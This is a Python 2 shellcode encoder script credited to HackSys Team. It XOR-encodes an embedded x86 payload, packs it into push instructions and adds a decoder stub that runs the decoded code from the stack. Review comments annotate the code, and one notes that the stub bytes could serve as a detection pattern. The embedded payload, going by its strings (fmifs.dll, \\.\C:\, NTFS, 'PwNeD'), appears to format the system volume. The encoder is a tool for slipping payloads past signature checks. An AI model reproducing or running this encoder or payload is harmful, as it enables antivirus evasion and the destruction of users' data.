#!/usr/bin/env python
# XOR Encoder With Decoder Stub
#
# Thanks to: Vivek Ramachandran (SecurityTube.NET)
# Tweaked by: Ashfaq Ansari (HackSys Team)
#
# HackSys Team - Panthera
# http://hacksys.vfreaks.com/
# hacksysteam@hotmail.com
#
# Purpose: take a raw x86 payload, pad it to a multiple of 4 bytes, XOR every
# byte with a single-byte key, and print a new byte string made of one
# `push imm32` per encoded dword followed by a short in-place decoder stub.
#
# This is a Python 2 script: it uses print statements, builds a bytearray
# directly from a str, and relies on `/` being integer division.
#
# NOTE(review): the statement layout below was reconstructed from a listing
# whose line breaks had been collapsed; the nesting of the informational
# print statements is inferred, not confirmed.

import sys

# Payload to be encoded, as a C-style escaped string.
# NOTE(review): the sample payload embeds the ASCII string "fmifs.dll" and the
# UTF-16LE strings "\\.\C:\", "NTFS" and "PwNeD"; this looks like a
# volume-format payload. Confirm by disassembly, and handle these bytes as a
# live sample rather than as inert test data.
c_style_shellcode = ("\xeb\x5a\x31\xc0\x8b\x34\x83\x01\xd6\x53\x50"
                     "\x31\xdb\x31\xc0\xac\xc1\xc3\x05\x01\xc3\x83"
                     "\xf8\x00\x75\xf3\xc1\xcb\x05\x39\xcb\x58\x5b"
                     "\x74\x03\x40\xeb\xde\xc3\x89\xd0\x8b\x40\x3c"
                     "\x8b\x44\x02\x78\x8d\x04\x02\x50\x8b\x40\x20"
                     "\x8d\x1c\x02\xe8\xc3\xff\xff\xff\x5b\x8b\x4b"
                     "\x24\x8d\x0c\x0a\x66\x8b\x04\x41\x25\xff\xff"
                     "\x00\x00\x8b\x5b\x1c\x8d\x1c\x1a\x8b\x04\x83"
                     "\x8d\x04\x02\xc3\x31\xc9\x64\xa1\x30\x00\x00"
                     "\x00\x8b\x40\x0c\x8b\x40\x1c\x8b\x50\x08\x8b"
                     "\x78\x20\x8b\x00\x3a\x4f\x18\x75\xf3\x68\x64"
                     "\x5b\x02\xab\x68\x10\xa1\x67\x05\x68\xa7\xd4"
                     "\x34\x3b\x68\x96\x90\x62\xd7\x68\x87\x8f\x46"
                     "\xec\x68\x06\xe5\xb0\xcf\x68\xdc\xdd\x1a\x33"
                     "\x89\xe5\x6a\x07\x59\x31\xff\x83\xf9\x01\x75"
                     "\x0c\x51\xeb\x1c\x8b\x44\x24\x1c\xff\xd0\x89"
                     "\xc2\x59\x51\x8b\x4c\xbd\x00\xe8\x6b\xff\xff"
                     "\xff\x59\x50\x47\xe2\xe0\x89\xe5\xeb\x0f\xe8"
                     "\xdf\xff\xff\xff\x66\x6d\x69\x66\x73\x2e\x64"
                     "\x6c\x6c\x00\xeb\x7e\x5e\x6a\x17\x59\x89\xcf"
                     "\x31\xd2\x52\x52\x6a\x03\x52\x6a\x03\x68\x00"
                     "\x00\x00\xc0\x56\x8b\x5d\x14\xff\xd3\x50\x83"
                     "\xec\x04\x31\xd2\x52\x8d\x5c\x24\x04\x53\x52"
                     "\x52\x52\x52\x68\x20\x00\x09\x00\x50\x8b\x5d"
                     "\x08\xff\xd3\xff\x74\x24\x04\x8b\x5d\x0c\xff"
                     "\xd3\x8d\x86\x26\x00\x00\x00\x50\x68\x00\x10"
                     "\x00\x00\x6a\x01\x8d\x86\x1a\x00\x00\x00\x50"
                     "\x8d\x86\x10\x00\x00\x00\x50\x6a\x0c\x8d\x46"
                     "\x08\x50\x8b\x5d\x00\xff\xd3\x68\xc8\x00\x00"
                     "\x00\x8b\x5d\x04\xff\xd3\x89\xf9\x83\x46\x08"
                     "\x01\xe2\x8d\x6a\x00\x8b\x5d\x10\xff\xd3\xe8"
                     "\x7d\xff\xff\xff\x5c\x00\x5c\x00\x2e\x00\x5c"
                     "\x00\x43\x00\x3a\x00\x5c\x00\x00\x00\x4e\x00"
                     "\x54\x00\x46\x00\x53\x00\x00\x00\x50\x00\x77"
                     "\x00\x4e\x00\x65\x00\x44\x00\x00\x00\x55\x89"
                     "\xe5\x31\xc0\x40\x5d\xc2\x0c\x00")

# Work on the payload as mutable bytes (Python 2: str -> bytearray of ints).
shellcode = bytearray(c_style_shellcode)

print 'Len of shellcode received: %d' %len(shellcode)

# NULL byte counter. The count is only reported; nothing below reads it.
null_count = 0

# Count the NULL bytes in the raw (un-encoded) payload.
for item in shellcode :
    if item == 00 :
        null_count = null_count + 1

print 'Number of NULLs: %d' % null_count

# Pad with NOPs (0x90) to a multiple of 4 bytes, because the output pushes
# and decodes the payload one 32-bit dword at a time.
if len(shellcode)%4 != 0 :
    shellcode += bytearray("\x90" *(4 - len(shellcode)%4))
    print 'Len of shellcode after NOP addition: %d' %len(shellcode)

xor_shellcode = bytearray('')

# Single-byte XOR key applied to every payload byte. The same byte is later
# repeated four times to form the 32-bit operand used by the decoder stub.
xor = 0xaa

# XOR encoding begins
for item in shellcode :
    xor_shellcode.append(xor^item)
# XOR encoding ends

rev = ''

# Render the encoded bytes in reverse order as literal "\xNN" text, so each
# byte occupies exactly 4 characters and each dword 16 characters.
for item in xor_shellcode[::-1] :
    rev += "\\x%02x" %item

final_shellcode = ''

# Emit one `push imm32` (opcode 0x68) per 16-character group. The four slices
# put the bytes of each group back into their original order, and because the
# groups run from the end of the payload to its start, the pushes leave the
# encoded payload on the stack in original order, beginning at ESP.
for item in map(''.join, zip(*[iter(rev)]*16)) :
    final_shellcode += "\\x68" + item[-4::] + item[-8:-4:] + item[-12:-8:] + item[-16:-12:]

# Decoder stub, appended after the pushes:
#   89 e6            mov  esi, esp        ; ESI -> encoded payload on the stack
#   31 c9            xor  ecx, ecx
#   b1 NN            mov  cl, NN          ; NN = number of dwords to decode
#   bb KK KK KK KK   mov  ebx, key dword  ; key byte repeated four times
#   31 1e            xor  [esi], ebx      ; decode one dword in place
#   83 c6 04         add  esi, 4
#   e2 f9            loop (back to the xor)
#   ff e4            jmp  esp             ; run the decoded payload
# The decoded payload executes from stack memory, and the fixed stub bytes
# together with the leading run of 0x68 pushes are stable across payloads,
# which makes them usable as a detection pattern for this encoder's output.
final_shellcode += "\\x89\\xe6\\x31\\xc9\\xb1"
final_shellcode += "\\x%02x" % (len(shellcode)/4)
final_shellcode += "\\xbb" + 4* ("\\x%02x" % xor)
final_shellcode += "\\x31\\x1e\\x83\\xc6\\x04\\xe2\\xf9\\xff\\xe4"
# Decoder stub added to final shellcode

# final_shellcode is text with 4 characters per byte, hence the division by 4.
print 'Length of the encoded shellcode: %d\n' % (len(final_shellcode)/4)

# Print the final XOR encoded shellcode
print final_shellcode